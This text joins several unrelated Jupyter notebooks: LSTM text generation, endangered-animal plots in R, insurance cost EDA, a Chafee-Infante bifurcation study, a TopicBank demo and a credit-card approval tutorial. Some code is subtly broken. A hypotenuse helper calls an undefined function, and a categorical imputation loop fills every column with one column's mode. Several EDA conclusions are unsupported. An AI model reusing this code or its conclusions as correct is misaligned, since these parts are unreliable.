``` # load ascii text and covert to lowercase doc = load_doc(in_filename) lines = doc.split('\n') # create mapping of unique chars to integers, and a reverse mapping chars = sorted(list(set(doc))) char_to_int = dict((c, i) for i, c in enumerate(chars)) int_to_char = dict((i, c) for i, c in enumerate(chars)) ``` Summary of loaded data ``` # summarize the loaded data n_chars = len(doc) n_vocab = len(chars) print ("Total Characters: ", n_chars) print ("Total Vocab: ", n_vocab) ``` Each training pattern of the network is comprised of let say 100 time steps of one character (X) followed by one character output (y). When creating these sequences, we slide this window along the whole document one character at a time, allowing each character a chance to be learned from the 100 characters that preceded it (except the first 100 characters of course). #### Prepare the dataset of input to output pairs encoded as integers ``` # prepare the dataset of input to output pairs encoded as integers seq_length = 100 dataX = [] dataY = [] for i in range(0, n_chars - seq_length, 1): seq_in = doc[i:i + seq_length] seq_out = doc[i + seq_length] dataX.append([char_to_int[char] for char in seq_in]) dataY.append(char_to_int[seq_out]) n_patterns = len(dataX) print ("Total Patterns: ", n_patterns) ``` #### One Hot Encoding of output variable ``` # reshape X to be [samples, time steps, features] X = np.reshape(dataX, (n_patterns, seq_length, 1)) # normalize X = X / float(n_vocab) # one hot encode the output variable y = np_utils.to_categorical(dataY) ``` #### Define the LSTM model >The network is slow to train (about 300 seconds per epoch on an Nvidia K520 GPU). Because of the slowness and because of our optimization requirements, we will use model checkpointing to record all of the network weights to file each time an improvement in loss is observed at the end of the epoch. We will use the best set of weights (lowest loss) to instantiate our generative model in the next section. 
``` # define the LSTM model model = Sequential() model.add(LSTM(256, input_shape=(X.shape[1], X.shape[2]))) model.add(Dropout(0.2)) model.add(Dense(y.shape[1], activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam') # define the checkpoint filepath="LSTM_Files/weights-improvement-{epoch:02d}-{loss:.4f}.hdf5" checkpoint = ModelCheckpoint(filepath, monitor='loss', verbose=1, save_best_only=True, mode='min') callbacks_list = [checkpoint] # fit the model model.fit(X, y, epochs=2, batch_size=128, callbacks=callbacks_list) ``` #### After running this piece of code , we will have a number of weight checkpoint files in the local directory. We can delete them all except the one with the smallest loss value. ``` # load the network weights filename = "LSTM_Files/weights-improvement-02-2.7259.hdf5" model.load_weights(filename) model.compile(loss='categorical_crossentropy', optimizer='adam') ``` #### Generate Text using deeper network (LSTM) ``` # pick a random seed start = np.random.randint(0, len(dataX)-1) pattern = dataX[start] print ("Seed:") print ("\"", ''.join([int_to_char[value] for value in pattern]), "\"") # generate characters for i in range(1000): x = np.reshape(pattern, (1, len(pattern), 1)) x = x / float(n_vocab) prediction = model.predict(x, verbose=0) index = np.argmax(prediction) result = int_to_char[index] seq_in = [int_to_char[value] for value in pattern] sys.stdout.write(result) pattern.append(index) pattern = pattern[1:len(pattern)] print ("\nDone.") ``` ![Victory](Images\GIFs\Jim_victory.gif) # <p style="text-align: center;">Conclusion<p><a id='Conclusion'></a> 1. We are not interested in the most accurate (classification accuracy) model of the training dataset. The model is the one that predicts each character in the training dataset perfectly. Instead we are interested in a generalization of the dataset that minimizes the chosen loss function. 
We are seeking a balance between generalization and overfitting but short of memorization. 2. As of now we are able to generate text, which seems much more gibberish but is making sense in some parts, the text generated can be tuned by adding different dense layers , building complex neuron network and by increasing epochs and decreasing the batch size. 3. Still working on BLEU and Meteor score though we are able to calculate it , it gives us a low value because the text that is being generated as of now is a bit gibberish and will yield a low value, ideally the score for BLEU should be between 0.0 to 1.0 and we got a value of 1.276854e-89, which is low , so if modeling is tweaked it may yield good results, this is still being worked upon 4. Model can also perform well , if we take a large vocab size and our input seed lenght is good enough, although time consuming, but output can vary differently if we experiment it in that way. 5. Adding weights to model with better accuracy results results in making a model (deeper and denser one better), we can keep on iterating that ways. 6. The collected data can be tested upon to find its sentiment by our third project notebook (sentiment analysis part 3) [Back to top](#Introduction) # <p style="text-align: center;">Future Scope<p><a id='Scope'></a> 1. Still working on BLEU and Meteor score though we are able to calculate it , it gives us a low value because the text that is being generated as of now is a bit gibberish and will yield a low value, ideally the score for BLEU should be between 0.0 to 1.0 and we got a value of 1.276854e-89, which is low , so if modeling is tweaked it may yield good results, this is still being worked upon 2. Train the model more by increasing the epochs & decreasing the batch size 3. Try different RNN and compare which is better 4. Try to train the data with more than 1 sources 5. Predict less characters for output 6. 
Do it on data collected through scraping of article websites , will yield better results 7. We can try to employ GANs , works good for image , can also be tried for texts The next part of the project is[Sentiment Analysis](Umbrella_Academy_INFO6105_Sentiment_Analysis.ipynb). Please click the link to follow to the next notebook. # <p style="text-align: center;">Contribution<p><a id='Contribution'></a> - Code by self : 60% - Code from external Sources : 40% [Back to top](#Introduction) # Citation: 1. https://github.com/abdulfatir/twitter-sentiment-analysis/blob/master/code/preprocess.py 2. https://stackoverflow.com/questions/8282553/removing-character-in-list-of-strings 3. https://github.com/bear/python-twitter/blob/master/twitter/parse_tweet.py 4. https://gist.github.com/dreikanter/2787146 5. https://docs.python.org/3.4/howto/unicode.html 6. https://www.kaggle.com/eliasdabbas/extract-entities-from-social-media-posts 7. https://machinelearningmastery.com/text-generation-lstm-recurrent-neural-networks-python-keras/ 8. https://machinelearningmastery.com/how-to-develop-a-word-level-neural-language-model-in-keras/ [Back to top](#Introduction) # <p style="text-align: center;">License<p><a id='License'></a> Copyright (c) 2019 Manali Sharma, Rushabh Nisher Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. [Back to top](#Introduction)
github_jupyter
``` library(tidyverse) library(skimr) #Import the new-animals_all.csv dataset into R as a dataframe, #and then Then perform the routine checks about the types of the columns, the missing values, and output a quick summary of the dataset. new_animal <- read_csv("new-animals_all.csv") new_animal %>% glimpse() new_animal %>% skim() %>% kable() #The variable named "Other Names and/or Listed subspecies" has lots of missing data. library(magrittr) # Classify Hawaii and Central America into North America, and Classify Australia into the Oceans and Island Nation. new_animal[new_animal$Area == "Hawaii",]%<>% mutate(Area = "North America") new_animal[new_animal$Area == "Central America",]%<>% mutate(Area = "North America") new_animal[new_animal$Area == "Australia",]%<>% mutate(Area = "the Oceans and Island Nations") ``` "T = threatened. ": A species likely to become endangered within the foreseeable future throughout all or a significant portion of its range.(https://www.fws.gov/endangered/about/listing-status-codes.html) "The IUCN Red List Categories define the extinction risk of species assessed. Nine categories extend from NE (Not Evaluated) to EX (Extinct). Critically Endangered (CR), Endangered (EN) and Vulnerable (VU) species are considered to be threatened with extinction. 
"NT :Near Threatened " "DD : Data Deficient"(https://www.iucn.org/resources/conservation-tools/iucn-red-list-threatened-species) so "T-" can classify into "NT :Near Threatened" ``` new_animal <- new_animal %>% filter(!is.na(Status)) new_animal[new_animal$Status == "T-",] %<>% mutate(Status = "NT") Status_total <- new_animal %>% group_by(Status, Area) %>% tally() %>% group_by(Area) %>% summarise(total=sum(n)) Status_total Status_Area_count <- new_animal %>% group_by(Status, Area) %>% tally() Status_Area_combine <- Status_Area_count %>% full_join(Status_total, by = "Area") Status_Area_combine Status_Area_combine$Status <- as_factor(Status_Area_combine$Status) Status_Area_combine$Status %>% class Status_Area_combine$Status <- factor(Status_Area_combine$Status, levels = c("NT", "DD", "VU", "EN", "CR")) animal_plot <- Status_Area_combine %>% ggplot() + geom_bar(aes(x=Area, y=n/total, fill=Status),stat="identity")+ scale_fill_brewer(palette="OrRd") + ggtitle("Proportion of Endangered Animal Count in each Region Status") + labs(y="proportion", x = "continent") + coord_flip() animal_plot ggsave(animal_plot,filename = "Animal plot.pdf",width = 12,height = 9) Status_total$Area <-as.factor(Status_total$Area) Status_total <- Status_total %>% mutate(proportion = total/sum(total)) %>% arrange(desc(proportion)) #reorder origin by ascending count Status_total$Area <- reorder(Status_total$Area, Status_total$proportion) animal_plot2 <- Status_total %>% ggplot(aes(x="", y=proportion, fill=Area))+ geom_bar(width = 1, stat = "identity", color = "white") + coord_polar("y", start=0) + scale_fill_brewer(palette="OrRd") + ggtitle("Proportion of Endangered Animal Count in each Region") + theme(plot.title = element_text(hjust = 0.5), axis.title.x =element_blank()) animal_plot2 ggsave(animal_plot2,filename = "Animal pie chart.pdf",width = 12,height = 9) ```
github_jupyter
def squares(n):
    """Compute the squares of numbers from 1 to n, such that the ith
    element of the returned list equals i^2.

    Raises ValueError when n < 1.
    """
    if n < 1:
        raise ValueError
    result = []
    for i in range(1, n + 1):
        result.append(i * i)
    return result
import math

def hypotenuse(n):
    """Return the hypotenuse of a right triangle whose legs have
    lengths n and n-1, computed via sum_of_squares.

    Raises ValueError when n < 2 (both legs must have positive length).
    """
    if n < 2:
        raise ValueError("n must be >= 2")
    if n == 2:
        # sum_of_squares(0) would raise, so the smallest case is handled
        # directly: legs 2 and 1 give 2**2 + 1**2 == 5.
        leg_square_sum = 5
    else:
        # sum_of_squares(n) - sum_of_squares(n - 2) == (n - 1)**2 + n**2
        leg_square_sum = sum_of_squares(n) - sum_of_squares(n - 2)
    return math.sqrt(leg_square_sum)
github_jupyter
## Fares Joni's Reasearch Questions 1. BMI of Gender in relation to Tobacco Users 2. Medical charges of Tobacco Users in relation to Age ##### Import data in from clean spreadsheet ``` import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns import os from Jscripts.project_functions.function import load_and_process df = load_and_process(r"C:\Users\fares\Documents\GitHub\course-project-group_1015\analysis\Johnny\Medical_Cost.csv") df.head(10) ``` #### Allowing data to read the Medical Costs per region since $ gives error when analyzing ``` df1 = df.copy() df1['Medical Costs per region'] = df1['Medical Costs per region'].str.replace('$','') df1['Medical Costs per region'] = df1['Medical Costs per region'].astype(float) ``` #### return the info ``` df.info() ``` #### Describe the data ``` df.describe() # ``` #### check for missing values "NA/0" in Data ``` df.isnull().sum() ``` #### show columns within Data ``` df.columns ``` #### calculate correlation between varibles ``` df.corr() ``` #### heatmap to visualize the correlation between functions within the raw data. Numbers close to 1.0 will have a brighter colour. 
``` f,ax = plt.subplots(figsize = (15,15)) sns.heatmap(df.corr(), annot=True, linewidths=.5, fmt='.1f', ax=ax) plt.show() ``` #### Heatmap but in winter format that looks cool ``` plt.figure(figsize=(8,6)) sns.heatmap(df.corr(),annot=True,cmap="winter_r") plt.show() ``` #### Show unique values for each variable ``` df.nunique(axis=0) ``` #### Displot to show the Age ``` sns.displot(df['Age']) ``` #### Displot to show the Children ``` sns.displot(df['Children']) ``` #### Displot to show the BMI ``` sns.displot(df['BMI']) ``` #### Barplot to show the Age in comparison to the BMI ``` sns.barplot(x = 'Age', y = 'BMI', data = df) ``` #### Pairplot to show various outcomes ``` sns.pairplot(data=df.iloc[:,:],corner=True) ``` #### Lineplot to show the Age and BMI comparison ``` df.BMI.plot(kind='line', color='g', label='BMI', linewidth=1, alpha=0.5, grid=True, linestyle='-') df.Age.plot(kind='line', color='r', label='Age', linewidth=1, alpha=0.5, grid=True, linestyle=':') plt.legend('upper left') plt.xlabel('Age') plt.ylabel('children') plt.title('Line Plot') plt.show() ``` #### Violinplot to show the Age and Gender comparison in regards to Tobacco Users ``` sns.violinplot(data=df, y='Age', x='Gender', hue='Tobacco User') ``` #### As shown in the above graph, the increase of age leads to an increase in medical costs #### Boxplot to show the BMI and Medical Costs per region comparison in regards to Tobacco Users ``` sns.boxplot(data=df, y="BMI", x="Medical Costs per region", hue="Tobacco User") ``` #### Boxplot to show the BMI and Age ``` df.boxplot(column='Age',by = 'BMI') ``` #### Boxplot to show the BMI and Age comparison in regards to Tobacco Users ``` sns.boxplot(data=df, y="Age", x="BMI", hue="Tobacco User") ``` #### Boxplot to show the Medical Costs per region and Age comparison in regards to Tobacco Users ``` sns.boxplot(data=df, y="Age", x="Medical Costs per region", hue="Tobacco User") ``` #### Boxplot of Age in regards to having Children ``` 
df.boxplot(column='Age',by = 'Children') ``` #### Histogram to analyze the Age ``` df.Age.plot(kind='hist', bins=50, figsize=(10,10)) plt.show() ``` #### Cleaning data for Female smokers ``` df3=(df['Gender']=='female') & (df['Tobacco User']=='yes') & (df['Children']>0) df[df3] ``` #### Cleaning data for male smokers ``` df3=(df['Gender']=='male') & (df['Tobacco User']=='yes') & (df['Children']>0) df[df3] ``` #### The data above shows that there are more Male smokers than female smokers #### Renaming Gender and Male to furter analyze ``` df1=df['Gender']=='female' df_female=df[df1] df2=df['Gender']=='male' df_male=df[df2] #df3=df['Medical Costs per region']=='charges' #df_charges=df[df3] ``` #### historgram to show male BMI's ``` df_male.BMI.plot(kind='hist', bins=50, figsize=(10,10)) plt.show() #### historgram to show female BMI's df_female.BMI.plot(kind='hist', bins=50, figsize=(10,10)) plt.show() ``` #### Females tend to have lower BMI than male BMI's as there are greater number of Male smokers, which lead to a health deficit.
github_jupyter
# Chafee-Infante方程式の離散化 ``` import numpy as np import pathfollowing as pf import matplotlib.pyplot as plt import seaborn as sns %matplotlib inline sns.set('poster', 'whitegrid', 'dark', rc={"lines.linewidth": 2, 'grid.linestyle': '-'}) N = 16 ds = np.pi / N def func(x, a): n = len(x) A = np.zeros(n) A = 2 * np.identity(n) for m in range(n-1): A[m,m+1] = -1.0 A[m+1,m] = -1.0 return A @ x - (ds**2) * (a[0] * x - x**3/3) def dfdx(x, a): n = len(x) A = 2 * np.identity(n) for m in range(n-1): A[m,m+1] = -1.0 A[m+1,m] = -1.0 for m in range(n): A[m,m] -= (ds**2) * (a[0] - x[m]**2) return A def dfda(x,a): return np.array([[-(ds**2) * y for y in x]]) x=np.zeros(N) a=np.array([0.5]) bd,bp,lp=pf.pathfollow(x, a, func, dfdx, dfda,nmax=800, h=0.05, epsr=1.0e-14, epsb=1.0e-14, quiet=True) for i in bp: print(i,bd[i]['a'], bd[i+1]['a']) v02 = pf.calcSwitchingVectorBP(bd[bp[0]], func, dfdx, dfda) x02=bd[bp[0]]['x'] a02=bd[bp[0]]['a'] bd02,bp02,lp02=pf.pathfollow(x02, a02, func, dfdx, dfda, w=v02, nmax=1000, h=0.05, epsr=1.0e-10, epsb=1.0e-10, quiet=True) v12 = pf.calcSwitchingVectorBP(bd[bp[1]], func, dfdx, dfda) x12=bd[bp[1]]['x'] a12=bd[bp[1]]['a'] bd12,bp12,lp12=pf.pathfollow(x12, a12, func, dfdx, dfda, w=v12, nmax=1000, h=0.05, epsr=1.0e-10, epsb=1.0e-10, quiet=True) v22 = pf.calcSwitchingVectorBP(bd[bp[2]], func, dfdx, dfda) x22=bd[bp[2]]['x'] a22=bd[bp[2]]['a'] bd22,bp22,lp22=pf.pathfollow(x22, a22, func, dfdx, dfda, w=v22, nmax=1000, h=0.05, epsr=1.0e-10, epsb=1.0e-10, quiet=True) v32 = pf.calcSwitchingVectorBP(bd[bp[3]], func, dfdx, dfda) x32=bd[bp[3]]['x'] a32=bd[bp[3]]['a'] bd32,bp32,lp32=pf.pathfollow(x32, a32, func, dfdx, dfda, w=v32, nmax=1000, h=0.1, epsr=1.0e-10, epsb=1.0e-10, quiet=True) bd_r = np.array([bd[m]['a'][0] for m in range(len(bd))]) bd_x = np.array([np.linalg.norm(bd[m]['x']) for m in range(len(bd))]) bd_r02 = np.array([bd02[m]['a'][0] for m in range(len(bd02))]) bd_x02 = np.array([np.linalg.norm(bd02[m]['x']) for m in range(len(bd02))]) bd_r12 = 
np.array([bd12[m]['a'][0] for m in range(len(bd12))]) bd_x12 = np.array([np.linalg.norm(bd12[m]['x']) for m in range(len(bd12))]) bd_r22 = np.array([bd22[m]['a'][0] for m in range(len(bd22))]) bd_x22 = np.array([np.linalg.norm(bd22[m]['x']) for m in range(len(bd22))]) bd_r32 = np.array([bd32[m]['a'][0] for m in range(len(bd32))]) bd_x32 = np.array([np.linalg.norm(bd32[m]['x']) for m in range(len(bd32))]) print(bd_r32, bd_x32) fig = plt.figure(figsize=(8, 5)) ax = fig.add_subplot(111) ax.set_xlim(0,20) ax.set_ylim(-2, 30) ax.set_xlabel(r"$\lambda$") ax.set_ylabel("$\max(u)$") ax.plot(bd_r, bd_x, '-k') ax.plot(bd_r02, bd_x02, '-r') ax.plot(bd_r12, bd_x12, '-b') ax.plot(bd_r22, bd_x22, '-k') ax.plot(bd_r32, bd_x32, '-r') ```
github_jupyter
# TopicBank Demo The notebook contains a demonstration of the [TopicBank approach](https://github.com/machine-intelligence-laboratory/OptimalNumberOfTopics/tree/master/topnum/search_methods/topic_bank) for finding an appropriate number of topics. Dataset used for demonstration is [20 Newsgroups](http://qwone.com/~jason/20Newsgroups/), preprocessed in a way described in the notebook [Making-Decorrelation-and-Topic-Selection-Friends.ipynb](https://github.com/machine-intelligence-laboratory/TopicNet/blob/master/topicnet/demos/Making-Decorrelation-and-Topic-Selection-Friends.ipynb). ``` # General imports import numpy as np import os from scipy.stats import gaussian_kde from matplotlib import pyplot as plt %matplotlib inline # Making `topnum` module visible for Python import sys sys.path.insert(0, '..') # Optimal number of topics from topnum.data.vowpal_wabbit_text_collection import VowpalWabbitTextCollection from topnum.search_methods import TopicBankMethod ``` ## Data In the folder below must reside the necessary data file in Vowpal Wabbit format. ``` DATA_FOLDER_PATH = 'data' os.listdir(DATA_FOLDER_PATH) vw_file_path = os.path.join( DATA_FOLDER_PATH, 'twenty_newsgroups__vw__natural_order.txt' ) ``` Checking if all OK with data, what modalities does the collection have. ``` ! head -n 7 $vw_file_path ``` Defining a text collection entity, which is to be passed to topic number search method later: ``` text_collection = VowpalWabbitTextCollection( vw_file_path, main_modality='@text' ) ``` Let's transform this collection to the TopicNet's Dataset (so as to look at it more easily). ``` dataset = text_collection._to_dataset() dataset._data.shape dataset._data.head() ``` The searching method itself. It has several parameters: some are specific for the renormalization approach, some are common for all the search methods presented in `topnum` module. 
``` optimizer = TopicBankMethod( data = dataset, # `text_collection` also would be fine here min_df_rate=0.001, # excluding too rare words from text collection's vocabulary max_num_models = 100, # number of models for collecting topics one_model_num_topics = 100, # number of topics in one model num_fit_iterations = 100, # 100 or 200 surely might be enough topic_score_threshold_percentile = 90 # 10% of the best model topics according to the score are going to be considered as good ) ``` Fulfilling the search: ``` %%time optimizer.search_for_optimum(text_collection) ``` The search method's result may be accessed as `optimizer._result`. Let's see what is available here: ``` list(optimizer._result.keys()) ``` Point estimate of the number of topics and standard deviation (std) over the restarts (`num_restarts`): ``` result_key_optimum = 'optimum' result_key_optimum_std = 'optimum_std' print( f'Optimum: {optimizer._result[result_key_optimum]} topics.' + f' Std: {optimizer._result[result_key_optimum_std]}' ) ``` The number of topics appeared to be $20$! So, the method worked pretty well for this particular dataset. 
``` result_key_bank_scores = 'bank_scores' result_key_bank_topic_scores = 'bank_topic_scores' result_key_model_scores = 'model_scores' result_key_model_topic_scores = 'model_topic_scores' print( 'Num iterations:', len(optimizer._result[result_key_bank_scores]) ) print( '...same as:', len(optimizer._result[result_key_model_scores]) ) print( '...and:', len(optimizer._result[result_key_model_topic_scores]) ) print( 'Final number of topics:', len(optimizer._result[result_key_bank_topic_scores]) ) ``` Let us look at the first elements in the result values: ``` # Scores for the bank as topic model list(optimizer._result[result_key_bank_scores])[0] # Averaged scores for bank topics for the particular iteration list(optimizer._result[result_key_bank_topic_scores])[0] # Scores for the model trained during the iteration list(optimizer._result[result_key_model_scores])[0] # Scores for each topic of the current model list(optimizer._result[result_key_model_topic_scores])[0][:3] ``` Using the saved scores one may analyze the process. 
For example, how the perplexity changes for the bank during its creation: ``` fig, ax = plt.subplots(1, 1, figsize=(12, 8)) x = range(len(list(optimizer._result[result_key_bank_scores]))) y = [s['perplexity_score'] for s in optimizer._result[result_key_bank_scores]] ax.scatter(x, y, s=100) ax.set_xlabel('Iteration (number of models)') ax.set_ylabel('Perplexity') ax.grid(True) plt.show() ``` And the perplexity for ordinary models: ``` fig, ax = plt.subplots(1, 1, figsize=(12, 8)) x = range(len(list(optimizer._result[result_key_model_scores]))) y = [s['perplexity_score'] for s in optimizer._result[result_key_model_scores]] ax.scatter(x, y, s=100) ax.set_xlabel('Iteration (number of models)') ax.set_ylabel('Perplexity of the model') ax.grid(True) plt.show() ``` And another score worth looking at — topic coherence (for example, intratext), as a measure of topic interpretability: ``` fig, ax = plt.subplots(1, 1, figsize=(12, 8)) score_name = 'intratext_coherence_score' x = range(len(list(optimizer._result[result_key_bank_topic_scores]))) y_bank = [ s[score_name] for s in optimizer._result[result_key_bank_topic_scores] ] y_model = [ s[score_name] for model_scores in optimizer._result[result_key_model_topic_scores] for s in model_scores ] y_model = [v if v is not None else 0.0 for v in y_model] gauss_for_bank = gaussian_kde(y_bank) gauss_for_models = gaussian_kde(y_model) x = np.arange(-0.01, 0.2, 0.001) ax.plot(x, gauss_for_bank(x), color='b', lw=5, label='topic bank') ax.plot(x, gauss_for_models(x), color='r', lw=5, label='ordinary model') ax.set_xlabel('Coherence value') ax.set_ylabel('KDE') ax.legend() ax.grid(True) plt.show() ``` Distance of newly added topic to the nearest topic already in the bank: ``` fig, ax = plt.subplots(1, 1, figsize=(12, 8)) x = range(len(list(optimizer._result[result_key_bank_topic_scores]))) y = [s['distance_to_nearest'] for s in optimizer._result[result_key_bank_topic_scores]] ax.scatter(x, y, s=100) ax.set_xlabel('Iteration (number of 
models)') ax.set_ylabel('Perplexity of the model') ax.grid(True) plt.show() ``` As the bank growths, this distance value shrinks.
github_jupyter
## 1. Credit card applications <p>Commercial banks receive <em>a lot</em> of applications for credit cards. Many of them get rejected for many reasons, like high loan balances, low income levels, or too many inquiries on an individual's credit report, for example. Manually analyzing these applications is mundane, error-prone, and time-consuming (and time is money!). Luckily, this task can be automated with the power of machine learning and pretty much every commercial bank does so nowadays. In this notebook, we will build an automatic credit card approval predictor using machine learning techniques, just like the real banks do.</p> ![title](datasets/credit_card.jpg) <p>We'll use the <a href="http://archive.ics.uci.edu/ml/datasets/credit+approval">Credit Card Approval dataset</a> from the UCI Machine Learning Repository. The structure of this notebook is as follows:</p> <ul> <li>First, we will start off by loading and viewing the dataset.</li> <li>We will see that the dataset has a mixture of both numerical and non-numerical features, that it contains values from different ranges, plus that it contains a number of missing entries.</li> <li>We will have to preprocess the dataset to ensure the machine learning model we choose can make good predictions.</li> <li>After our data is in good shape, we will do some exploratory data analysis to build our intuitions.</li> <li>Finally, we will build a machine learning model that can predict if an individual's application for a credit card will be accepted.</li> </ul> <p>First, loading and viewing the dataset. We find that since this data is confidential, the contributor of the dataset has anonymized the feature names.</p> ``` # Import pandas # ... YOUR CODE FOR TASK 1 ... import pandas as pd # Load dataset cc_apps = pd.read_csv('datasets/cc_approvals.data', header = None) # Inspect data # ... YOUR CODE FOR TASK 1 ... cc_apps.head() ``` ## 2. 
Inspecting the applications <p>The output may appear a bit confusing at its first sight, but let's try to figure out the most important features of a credit card application. The features of this dataset have been anonymized to protect the privacy, but <a href="http://rstudio-pubs-static.s3.amazonaws.com/73039_9946de135c0a49daa7a0a9eda4a67a72.html">this blog</a> gives us a pretty good overview of the probable features. The probable features in a typical credit card application are <code>Gender</code>, <code>Age</code>, <code>Debt</code>, <code>Married</code>, <code>BankCustomer</code>, <code>EducationLevel</code>, <code>Ethnicity</code>, <code>YearsEmployed</code>, <code>PriorDefault</code>, <code>Employed</code>, <code>CreditScore</code>, <code>DriversLicense</code>, <code>Citizen</code>, <code>ZipCode</code>, <code>Income</code> and finally the <code>ApprovalStatus</code>. This gives us a pretty good starting point, and we can map these features with respect to the columns in the output. </p> <p>As we can see from our first glance at the data, the dataset has a mixture of numerical and non-numerical features. This can be fixed with some preprocessing, but before we do that, let's learn about the dataset a bit more to see if there are other dataset issues that need to be fixed.</p> ``` # Print summary statistics cc_apps_description = cc_apps.describe() print(cc_apps_description) print("\n") # Print DataFrame information cc_apps_info = cc_apps.info() print(cc_apps_info) print("\n") # Inspect missing values in the dataset # ... YOUR CODE FOR TASK 2 ... cc_apps.tail(17) ``` ## 3. Handling the missing values (part i) <p>We've uncovered some issues that will affect the performance of our machine learning model(s) if they go unchanged:</p> <ul> <li>Our dataset contains both numeric and non-numeric data (specifically data that are of <code>float64</code>, <code>int64</code> and <code>object</code> types). 
Specifically, the features 2, 7, 10 and 14 contain numeric values (of types float64, float64, int64 and int64 respectively) and all the other features contain non-numeric values.</li> <li>The dataset also contains values from several ranges. Some features have a value range of 0 - 28, some have a range of 2 - 67, and some have a range of 1017 - 100000. Apart from these, we can get useful statistical information (like <code>mean</code>, <code>max</code>, and <code>min</code>) about the features that have numerical values. </li> <li>Finally, the dataset has missing values, which we'll take care of in this task. The missing values in the dataset are labeled with '?', which can be seen in the last cell's output.</li> </ul> <p>Now, let's temporarily replace these missing value question marks with NaN.</p> ``` # Import numpy # ... YOUR CODE FOR TASK 3 ... import numpy as np # Inspect missing values in the dataset print(cc_apps.tail(17)) # Replace the '?'s with NaN cc_apps = cc_apps.replace('?', np.NaN) print('\n\n') # Inspect the missing values again # ... YOUR CODE FOR TASK 3 ... print(cc_apps.tail(17)) ``` ## 4. Handling the missing values (part ii) <p>We replaced all the question marks with NaNs. This is going to help us in the next missing value treatment that we are going to perform.</p> <p>An important question that gets raised here is <em>why are we giving so much importance to missing values</em>? Can't they be just ignored? Ignoring missing values can affect the performance of a machine learning model heavily. While ignoring the missing values our machine learning model may miss out on information about the dataset that may be useful for its training. Then, there are many models which cannot handle missing values implicitly such as LDA. 
</p> <p>So, to avoid this problem, we are going to impute the missing values with a strategy called mean imputation.</p> ``` # Impute the missing values with mean imputation cc_apps.fillna(cc_apps.mean(), axis = 0, inplace=True) # Count the number of NaNs in the dataset to verify # ... YOUR CODE FOR TASK 4 ... print(cc_apps.isna().sum()) ``` ## 5. Handling the missing values (part iii) <p>We have successfully taken care of the missing values present in the numeric columns. There are still some missing values to be imputed for columns 0, 1, 3, 4, 5, 6 and 13. All of these columns contain non-numeric data and this why the mean imputation strategy would not work here. This needs a different treatment. </p> <p>We are going to impute these missing values with the most frequent values as present in the respective columns. This is <a href="https://www.datacamp.com/community/tutorials/categorical-data">good practice</a> when it comes to imputing missing values for categorical data in general.</p> ``` cc_apps[1].dtype cc_apps.describe(exclude = 'number') cc_apps[3].value_counts().index[0] # Iterate over each column of cc_apps for col in cc_apps.columns: # Check if the column is of object type if cc_apps[col].dtype == 'object': # Impute with the most frequent value cc_apps = cc_apps.fillna(cc_apps[col].value_counts().index[0]) # Count the number of NaNs in the dataset and print the counts to verify # ... YOUR CODE FOR TASK 5 ... print(cc_apps.isna().sum()) ``` ## 6. Preprocessing the data (part i) <p>The missing values are now successfully handled.</p> <p>There is still some minor but essential data preprocessing needed before we proceed towards building our machine learning model. We are going to divide these remaining preprocessing steps into three main tasks:</p> <ol> <li>Convert the non-numeric data into numeric.</li> <li>Split the data into train and test sets. 
</li> <li>Scale the feature values to a uniform range.</li> </ol> <p>First, we will be converting all the non-numeric values into numeric ones. We do this because not only it results in a faster computation but also many machine learning models (like XGBoost) (and especially the ones developed using scikit-learn) require the data to be in a strictly numeric format. We will do this by using a technique called <a href="http://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.LabelEncoder.html">label encoding</a>.</p> ``` # Import LabelEncoder # ... YOUR CODE FOR TASK 6 ... from sklearn.preprocessing import LabelEncoder # Instantiate LabelEncoder # ... YOUR CODE FOR TASK 6 ... le = LabelEncoder() # Iterate over all the values of each column and extract their dtypes for col in cc_apps.columns: # Compare if the dtype is object if cc_apps[col].dtype == 'object': # Use LabelEncoder to do the numeric transformation cc_apps[col]=le.fit_transform(cc_apps[col]) ``` ## 7. Splitting the dataset into train and test sets <p>We have successfully converted all the non-numeric values to numeric ones.</p> <p>Now, we will split our data into train set and test set to prepare our data for two different phases of machine learning modeling: training and testing. Ideally, no information from the test data should be used to scale the training data or should be used to direct the training process of a machine learning model. Hence, we first split the data and then apply the scaling.</p> <p>Also, features like <code>DriversLicense</code> and <code>ZipCode</code> are not as important as the other features in the dataset for predicting credit card approvals. We should drop them to design our machine learning model with the best set of features. In Data Science literature, this is often referred to as <em>feature selection</em>. </p> ``` # Import train_test_split # ... YOUR CODE FOR TASK 7 ... 
from sklearn.model_selection import train_test_split # Drop the features 11 and 13 and convert the DataFrame to a NumPy array cc_apps = cc_apps.drop([11, 13], axis=1) cc_apps = cc_apps.values # Segregate features and labels into separate variables X,y = cc_apps[:,0:13] , cc_apps[:,13] # Split into train and test sets X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.33, random_state = 42) ``` ## 8. Preprocessing the data (part ii) <p>The data is now split into two separate sets - train and test sets respectively. We are only left with one final preprocessing step of scaling before we can fit a machine learning model to the data. </p> <p>Now, let's try to understand what these scaled values mean in the real world. Let's use <code>CreditScore</code> as an example. The credit score of a person is their creditworthiness based on their credit history. The higher this number, the more financially trustworthy a person is considered to be. So, a <code>CreditScore</code> of 1 is the highest since we're rescaling all the values to the range of 0-1.</p> ``` # Import MinMaxScaler # ... YOUR CODE FOR TASK 8 ... from sklearn.preprocessing import MinMaxScaler # Instantiate MinMaxScaler and use it to rescale X_train and X_test scaler = MinMaxScaler(feature_range=(0, 1)) rescaledX_train = scaler.fit_transform(X_train) # Only transform (do not re-fit) the test set: fitting on X_test would leak test-set information into the scaling rescaledX_test = scaler.transform(X_test) ``` ## 9. 